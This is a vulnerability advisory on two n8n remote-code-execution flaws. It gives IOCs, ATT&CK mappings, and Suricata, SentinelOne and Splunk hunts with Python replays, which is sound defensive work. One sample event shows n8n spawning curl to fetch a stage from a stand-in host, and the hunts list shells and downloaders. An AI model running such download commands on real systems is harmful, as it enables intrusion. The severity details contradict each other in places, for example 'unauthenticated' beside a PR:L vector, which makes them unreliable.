CVE-2026-21858 and CVE-2026-21877 Ni8mare Flaw in n8n Automation Tool (Disclosure and Alert)

BLUF

A maximum-severity vulnerability in the n8n open-source automation tool, nicknamed "Ni8mare", allows unauthenticated or authenticated attackers to fully compromise vulnerable deployments via Remote Code Execution (RCE). Active exploitation in the wild for the unauthenticated version (CVE-2026-21858) is raising concerns, while the authenticated RCE (CVE-2026-21877) is also a major risk.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by exploitation or suspected compromise of vulnerable n8n automation deployments (CVE-2026-21858 and CVE-2026-21877):

  • Low-end total cost: $900,000 – $1.4M
    (Rapid detection, limited exposure, minimal downstream workflow abuse)

  • Typical expected range: $1.8M – $3.2M
    (Confirmed RCE, credential exposure, broad workflow validation and rebuild required)

  • Upper-bound realistic scenarios: $3.5M – $5.5M
    (Internet-exposed automation, lateral movement into integrated systems, regulatory involvement)

Key cost driver:

Costs are driven less by immediate system outages and more by loss of trust in automation integrity. Remote code execution within orchestration platforms forces organizations to assume credential compromise, validate every connected workflow, and reassess the security of downstream integrations—extending recovery timelines and significantly increasing assurance, compliance, and governance costs well beyond initial containment.

Potential Affected Sectors

·         Any organization using n8n for automation, particularly those with internet-exposed instances.

Potential Affected Countries

·         Global

Date of First Reported Activity

·         January 8, 2026

Date of Last Reported Activity Update

·         January 8, 2026

CVEs and CVSS Vectors

CVE-2026-21858

CVSS 3.1 Vector

·         (9.9) AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nessus ID

·         115105

Is this on the KEV list?

·         Not at this time

What is the patch date for CVE-2026-21858?

·         Not applicable at this time

URL Link to Patch

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg

CVE-2026-21877

Authenticated RCE

CVSS 3.1 Vector

·         (9.9) AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nessus ID

·         115104

Is this on the KEV list?

·         Not at this time

What is the patch date for CVE-2026-21877?

·         Not applicable at this time

URL Link to Patch

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263

APT Names

·         No APT groups have been associated with CVE-2026-21858 or CVE-2026-21877 at this time.

Associated Criminal Organization Names

·         No criminal organizations have been associated with CVE-2026-21858 or CVE-2026-21877 at this time.

IOCs

CVE-2026-21858 (Ni8mare)

Behavioral Indicators:

·         Inbound Requests

o   Watch for unusual Content-Type headers on requests to /webhook/ endpoints, crafted to override n8n's internal request parsing.

·         File Access

o   Unauthorized attempts to access sensitive local files (e.g., n8n configuration files, authentication secrets) via manipulated file upload parsers.

·         Session Forgery

o   Unexpected administrative logins or session creation without valid credentials, as the flaw allows for forging admin sessions.

CVE-2026-21877

Behavioral Indicators

·         Unauthorized Command Execution: Execution of system commands (CWE-94) originating from legitimate-appearing automation workflows.

·         Node Abuse: High activity or unusual configurations involving the "Git node" by non-admin users.

Tools Used in Campaign

·         No information available in open sources (OS)

TTPs

CVE-2026-21858

·         T1190 Exploit Public-Facing Application

o   Attackers exploit the webhook endpoint via specially crafted HTTP requests to bypass initial security checks.

·         T1083 File and Directory Discovery

o   The flaw allows unauthenticated remote attackers to read arbitrary local files from the server, such as SQLite databases and configuration files.

·         T1550.002 Use Alternate Authentication Material: Pass the Hash/Ticket

o   Attackers use extracted session secrets to forge administrator sessions.

·         T1059 Command and Scripting Interpreter

o   Final exploitation results in arbitrary command execution on the host system.

·         T1021 Remote Services

o   Successful exploitation often leads to lateral movement into connected services like cloud storage or internal APIs.

CVE-2026-21877

·         T1078 Valid Accounts

o   Exploitation requires an authenticated user to perform the initial actions.

·         T1222 File and Directory Permissions Modification

o   The vulnerability stems from an arbitrary file write condition, allowing users to modify or create files on the server.

·         T1059 Command and Scripting Interpreter

o   Authenticated users abuse the Git node to execute malicious code with the privileges of the n8n service.

·         T1534 Internal Spearphishing

o   (Impact-based) Attackers may use the compromised automation platform to send malicious messages or data through integrated communication channels.

Malware Names

·         None reported at this time

Suggested Rules / suggested hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

CVE-2026-21858 (Unauthenticated RCE):

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT n8n Content-Type Confusion (CVE-2026-21858)"; flow:established,to_server; content:"POST"; http_method; content:"/webhook/"; http_uri; content:"Content-Type|3a|"; http_header; pcre:"/Content-Type\s*:\s*(?!multipart\/form-data).*/Hi"; content:"multipart/form-data"; http_client_body; reference:cve,2026-21858; classtype:attempted-admin; sid:202621858; rev:1;)

SentinelOne

Endpoint/Process Hunting: Suspicious Child Process

Query:

EndpointName contains "*" AND ProcessName = "node" AND CommandLine contains "n8n" AND (ChildProcessName in ("cmd.exe", "powershell.exe", "sh", "bash") OR ChildProcessName contains "curl" OR ChildProcessName contains "wget")


Arbitrary File Write (CVE-2026-21877)

Hunts for n8n writing to sensitive locations or executable paths.

Query:

ProcessName = "node" AND CommandLine contains "n8n" AND FilePathMatch ("*/.n8n/*", "*/etc/*", "*/var/www/*", "*.sh", "*.py") AND FileActionType = "Write"
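Both endpoint hunts above (n8n's node process spawning a shell or downloader, and n8n writing into sensitive or executable paths) can be replayed offline against a small set of telemetry events. The following is an added example, not part of the original advisory and not SentinelOne's query language or schema: the event field names (endpoint, parent_name, parent_cmdline, child_name, process_name, action, path) and the sample events are constructed assumptions chosen to mirror the two queries, and the glob list is the one the file-write hunt uses.

```python
from fnmatch import fnmatch

# Constructed endpoint telemetry in a generic shape (an assumption, not SentinelOne's
# native schema). The sample events below are made up to exercise both hunts.
N8N_PARENT_CMDLINE = "node /usr/local/bin/n8n start"
SAMPLE_EVENTS = [
    # Process events: the n8n node process spawning children.
    {"type": "process", "endpoint": "n8n-prod-01", "parent_name": "node",
     "parent_cmdline": N8N_PARENT_CMDLINE, "child_name": "bash", "child_cmdline": "bash -c id"},
    {"type": "process", "endpoint": "n8n-prod-01", "parent_name": "node",
     "parent_cmdline": N8N_PARENT_CMDLINE, "child_name": "curl", "child_cmdline": "curl http://203.0.113.9/stage"},
    {"type": "process", "endpoint": "n8n-prod-01", "parent_name": "node",
     "parent_cmdline": N8N_PARENT_CMDLINE, "child_name": "node", "child_cmdline": "node worker.js"},   # benign child
    {"type": "process", "endpoint": "dev-box-02", "parent_name": "node",
     "parent_cmdline": "node server.js", "child_name": "bash", "child_cmdline": "bash build.sh"},     # not n8n
    # File events attributed to the same n8n process.
    {"type": "file", "endpoint": "n8n-prod-01", "process_name": "node",
     "cmdline": N8N_PARENT_CMDLINE, "action": "Write", "path": "/home/n8n/.n8n/config"},
    {"type": "file", "endpoint": "n8n-prod-01", "process_name": "node",
     "cmdline": N8N_PARENT_CMDLINE, "action": "Write", "path": "/tmp/stage.sh"},
    {"type": "file", "endpoint": "n8n-prod-01", "process_name": "node",
     "cmdline": N8N_PARENT_CMDLINE, "action": "Read", "path": "/etc/passwd"},                         # read, not write
    {"type": "file", "endpoint": "n8n-prod-01", "process_name": "node",
     "cmdline": N8N_PARENT_CMDLINE, "action": "Write", "path": "/home/n8n/uploads/report.csv"},       # benign write
]

# Child-process criteria from the first hunt.
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}
DOWNLOADER_SUBSTRINGS = ("curl", "wget")
# Path globs from the second hunt (FilePathMatch list).
SENSITIVE_GLOBS = ("*/.n8n/*", "*/etc/*", "*/var/www/*", "*.sh", "*.py")


def is_n8n_process(name, cmdline):
    """ProcessName = "node" AND CommandLine contains "n8n"."""
    return name == "node" and "n8n" in cmdline


def suspicious_child_processes(events):
    """n8n's node process spawning a shell, or anything named like curl/wget."""
    hits = []
    for ev in events:
        if ev["type"] != "process":
            continue
        if not is_n8n_process(ev["parent_name"], ev["parent_cmdline"]):
            continue
        child = ev["child_name"]
        if child in SHELLS or any(s in child for s in DOWNLOADER_SUBSTRINGS):
            hits.append((ev["endpoint"], child, ev["child_cmdline"]))
    return hits


def sensitive_file_writes(events):
    """n8n's node process writing to a path that matches one of the sensitive globs."""
    hits = []
    for ev in events:
        if ev["type"] != "file" or ev["action"] != "Write":
            continue
        if not is_n8n_process(ev["process_name"], ev["cmdline"]):
            continue
        # fnmatch's '*' also matches '/', so "*/etc/*" covers nested paths.
        if any(fnmatch(ev["path"], g) for g in SENSITIVE_GLOBS):
            hits.append((ev["endpoint"], ev["path"]))
    return hits


if __name__ == "__main__":
    for hit in suspicious_child_processes(SAMPLE_EVENTS):
        print("child process:", hit)
    for hit in sensitive_file_writes(SAMPLE_EVENTS):
        print("sensitive write:", hit)
```

Two caveats worth carrying into a production version: legitimate n8n nodes (for example the Execute Command node, if enabled) will also spawn shells, so the child-process hit needs to be compared against the workflows you expect to do that; and in container deployments the parent process may be a wrapper such as an init shim rather than `node` directly, so the parent-name check should be validated against your own process tree before the rule is trusted.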


Splunk

Since exploitation involves manipulating webhooks and file handling logic, monitor web server logs for suspicious headers and patterns.

Hunt for Content-Type Mismatches (CVE-2026-21858):

index=web sourcetype=access_combined uri_path="*/webhook/*" method=POST
| where NOT match(content_type, "(?i)multipart/form-data") AND match(_raw, "form-data; name=")
| stats count by src_ip, uri_path, user_agent
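The Content-Type mismatch the behavioral indicators and the Splunk hunt above both describe (a multipart body arriving at a /webhook/ path under a header that does not declare multipart/form-data) is easy to express as a standalone check. The following is an added example, not part of the original advisory and not n8n or Splunk code: the request record fields (src_ip, method, uri_path, content_type, body) and the sample requests are constructed assumptions standing in for what a reverse proxy or WAF with request-body logging could emit in front of n8n.

```python
import re
from collections import Counter

# Constructed multipart body fragment reused across the sample requests (not real traffic).
MULTIPART_BODY = (
    '------x\r\nContent-Disposition: form-data; name="file"\r\n\r\nhello\r\n------x--'
)

# Constructed captured requests; the field names are an assumption for this example.
SAMPLE_REQUESTS = [
    # Benign: header and body agree.
    {"src_ip": "203.0.113.10", "method": "POST", "uri_path": "/webhook/intake",
     "content_type": "multipart/form-data; boundary=----x", "body": MULTIPART_BODY},
    # Suspicious: multipart body, header claims JSON.
    {"src_ip": "198.51.100.7", "method": "POST", "uri_path": "/webhook/intake",
     "content_type": "application/json", "body": MULTIPART_BODY},
    # Same source, second attempt with another mismatched header.
    {"src_ip": "198.51.100.7", "method": "POST", "uri_path": "/webhook/intake",
     "content_type": "text/plain", "body": MULTIPART_BODY},
    # Mismatch on a non-webhook path: outside the scope of this hunt.
    {"src_ip": "198.51.100.7", "method": "POST", "uri_path": "/rest/login",
     "content_type": "application/json", "body": MULTIPART_BODY},
    # GET with no body: ignored.
    {"src_ip": "192.0.2.5", "method": "GET", "uri_path": "/webhook/intake",
     "content_type": "", "body": ""},
]

# Same two patterns the Splunk search uses: header check and body check.
HEADER_IS_MULTIPART = re.compile(r"multipart/form-data", re.IGNORECASE)
BODY_LOOKS_MULTIPART = re.compile(r"form-data;\s*name=", re.IGNORECASE)


def is_content_type_mismatch(req):
    """True for a POST to a /webhook/ path whose body carries multipart
    form-data parts while the Content-Type header does not declare multipart."""
    if req.get("method", "").upper() != "POST":
        return False
    if "/webhook/" not in req.get("uri_path", ""):
        return False
    header_multipart = bool(HEADER_IS_MULTIPART.search(req.get("content_type", "")))
    body_multipart = bool(BODY_LOOKS_MULTIPART.search(req.get("body", "")))
    return body_multipart and not header_multipart


def hunt_content_type_mismatches(requests):
    """Equivalent of the '| stats count by src_ip, uri_path' step:
    returns {(src_ip, uri_path): count} for mismatched requests only."""
    counts = Counter()
    for req in requests:
        if is_content_type_mismatch(req):
            counts[(req["src_ip"], req["uri_path"])] += 1
    return dict(counts)


if __name__ == "__main__":
    for (src, path), n in hunt_content_type_mismatches(SAMPLE_REQUESTS).items():
        print(f"{src} -> {path}: {n} mismatched request(s)")
```

Note that a standard access_combined log does not record the request body, so the `_raw` body check in the Splunk hunt only works where the proxy or WAF in front of n8n is configured to log bodies; the same limitation applies to this script's input.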


Hunt for Suspicious Workflow Edits (CVE-2026-21877)

Monitor audit logs for unexpected workflow modifications followed by RCE-like behavior.

index=n8n_logs (message="*workflow updated*" OR message="*credential updated*" OR message="*node execution*")
| transaction user startsWith="workflow updated" endsWith="node execution" maxspan=5m
| table _time, user, workflow_id, command
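The transaction above pairs a user's workflow edit with a node execution by the same user inside a five-minute window. The following is an added example, not part of the original advisory and not n8n's own logging format: it implements that pairing over constructed key=value audit lines, and the field names (user, message, workflow_id, node) and timestamps are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed audit lines in a key=value shape (an assumption, not n8n's real log format).
SAMPLE_LOG = """\
2026-01-08T10:00:00Z user=alice message="workflow updated" workflow_id=42
2026-01-08T10:02:30Z user=alice message="node execution" workflow_id=42 node="Git"
2026-01-08T10:10:00Z user=bob message="workflow updated" workflow_id=7
2026-01-08T10:20:00Z user=bob message="node execution" workflow_id=7 node="HTTP Request"
2026-01-08T11:00:00Z user=carol message="credential updated" credential_id=3
2026-01-08T11:01:00Z user=carol message="node execution" workflow_id=9 node="Execute Command"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+message="(?P<msg>[^"]+)"(?P<rest>.*)$')
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Mirrors the Splunk search: these messages are collected, but only
# "workflow updated" opens a window (startsWith) and "node execution" closes it (endsWith).
COLLECTED = {"workflow updated", "credential updated", "node execution"}
START_MESSAGE = "workflow updated"
END_MESSAGE = "node execution"
MAXSPAN = timedelta(minutes=5)


def parse_line(line):
    """Parse one audit line into a dict, or return None if it does not fit the shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
        "user": m.group("user"),
        "message": m.group("msg"),
    }
    for key, quoted, bare in KV_RE.findall(m.group("rest")):
        event[key] = quoted or bare
    return event


def correlate(log_text, maxspan=MAXSPAN):
    """Return one hit per (workflow updated -> node execution) pair by the same
    user within maxspan, equivalent to the transaction command above."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events = [e for e in events if e["message"] in COLLECTED]
    events.sort(key=lambda e: e["ts"])
    pending = {}   # user -> most recent open "workflow updated" event
    hits = []
    for e in events:
        if e["message"] == START_MESSAGE:
            pending[e["user"]] = e
        elif e["message"] == END_MESSAGE:
            start = pending.pop(e["user"], None)
            if start is not None and e["ts"] - start["ts"] <= maxspan:
                hits.append({
                    "user": e["user"],
                    "workflow_id": e.get("workflow_id"),
                    "node": e.get("node"),
                    "seconds": int((e["ts"] - start["ts"]).total_seconds()),
                })
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_LOG):
        print(hit)
```

In the sample, only alice's edit is followed by an execution inside five minutes; bob's execution arrives ten minutes later and falls outside the window, and carol's credential change never opens a window because the transaction starts only on "workflow updated". The node name on the closing event is the field to pivot on, since the authenticated flaw (CVE-2026-21877) is tied to the Git node.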

Delivery Method

·         Network exploitation

Email Samples

·         Not applicable

References

NVD

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2026-21858

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2026-21877

GitHub

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg

·         hxxps://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263
